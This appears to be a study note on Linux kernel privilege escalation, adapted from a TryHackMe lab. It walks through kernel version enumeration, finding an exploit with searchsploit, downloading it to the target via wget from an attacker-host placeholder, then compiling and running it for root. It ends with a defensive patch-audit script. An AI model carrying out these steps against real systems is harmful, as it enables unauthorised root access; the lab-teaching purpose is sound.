# Kernel exploit

> The kernel on Linux systems manages the communication between components such as the memory on the system and applications. This critical function requires the kernel to have specific privileges; thus, a successful exploit will potentially lead to root privileges.

### Example

Assume a remote shell has been obtained on an Ubuntu Linux machine as a low-privileged user. Some important information can be gathered with the enumeration commands discussed in the previous section, `Enumeration`.

1. Gather information on the kernel version

```bash
$ cat /proc/version
Linux version 3.13.0-24-generic ...

# OR

$ uname -a
Linux ... 3.13.0-24-generic ...
```

2. Search for vulnerabilities

**From the attacker machine**

```bash
$ searchsploit linux kernel 3.13

...
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'ove | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'ove | linux/local/37293.txt
...
```

Or directly from Exploit-DB:

{% embed url="https://www.exploit-db.com/exploits/37292" %}

**Look for the exploit code and run a Python web server to serve the content**

```bash
$ find / -path '*linux/local/37292.c' 2>/dev/null
/usr/share/exploitdb/exploits/linux/local/37292.c

$ cd /usr/share/exploitdb/exploits/linux/local

...linux/local$ python3 -m http.server 8888
```

3. Navigate to a directory that is writable and executable by all users, such as `/tmp`

**From the target machine**

```bash
# -perm -003 matches directories where "other" has both the write and execute bits set
$ find / -perm -003 -type d 2>/dev/null
/tmp
...

$ cd /tmp
$ wget http://<attacker_ip>:<port>/37292.c
...

$ gcc 37292.c -o 37292
$ ./37292

...

root# whoami
root

root# ...
```

Adapted from task 5 of the TryHackMe practice room:

{% embed url="https://tryhackme.com/r/room/linprivesc" %}
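
The version match in steps 1 and 2 can also be run defensively across a host inventory to find kernels that still need patching. The script below is an added example, not part of the original page or the TryHackMe room; its function names and sample inventory are constructed, and the range `3.13.0` to `3.19` is taken from the searchsploit title above.

```bash
# Added example: patch-audit check for the kernel range in the searchsploit
# title ("3.13.0 < 3.19"). Function names and inventory are constructed.

# Release field from `uname -r`, `uname -a` or /proc/version text; in both
# multi-word formats the release is the third word.
kernel_release() {
    printf '%s\n' "$1" | awk '{ print (NF >= 3 ? $3 : $1) }'
}

# "3.13.0-24-generic" -> 3013000. Returns 1 if no leading x.y[.z] version.
version_to_int() {
    base=$(printf '%s\n' "$1" | grep -oE '^[0-9]+\.[0-9]+(\.[0-9]+)?') || return 1
    printf '%s\n' "$base" | awk -F. '{ printf "%d\n", $1 * 1000000 + $2 * 1000 + $3 }'
}

# 0: low <= release < high (upstream version only), 1: outside, 2: unparsable.
in_affected_range() {
    v=$(version_to_int "$(kernel_release "$1")") || return 2
    lo=$(version_to_int "$2") && hi=$(version_to_int "$3") || return 2
    [ "$v" -ge "$lo" ] && [ "$v" -lt "$hi" ]
}

# Classify "host release" lines from stdin. REVIEW means the upstream version
# is in range; distro kernels backport fixes, so confirm against the vendor's
# package changelog before treating the host as unpatched.
audit_inventory() {
    while read -r host release; do
        [ -n "$host" ] || continue
        rc=0
        in_affected_range "$release" "$1" "$2" || rc=$?
        case $rc in
            0) echo "$host REVIEW $release" ;;
            1) echo "$host ok $release" ;;
            *) echo "$host UNPARSED $release" ;;
        esac
    done
}

# Constructed sample inventory: hostname followed by `uname -r` output.
sample_inventory() {
    cat <<'EOF'
web01 3.13.0-24-generic
db01 3.19.0-15-generic
build01 4.4.0-210-generic
edge01 custom-kernel
EOF
}

sample_inventory | audit_inventory 3.13.0 3.19
```

Only `web01` is flagged for review; `db01` sits exactly on the exclusive upper bound, and `edge01` is reported as unparsed rather than silently passed.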
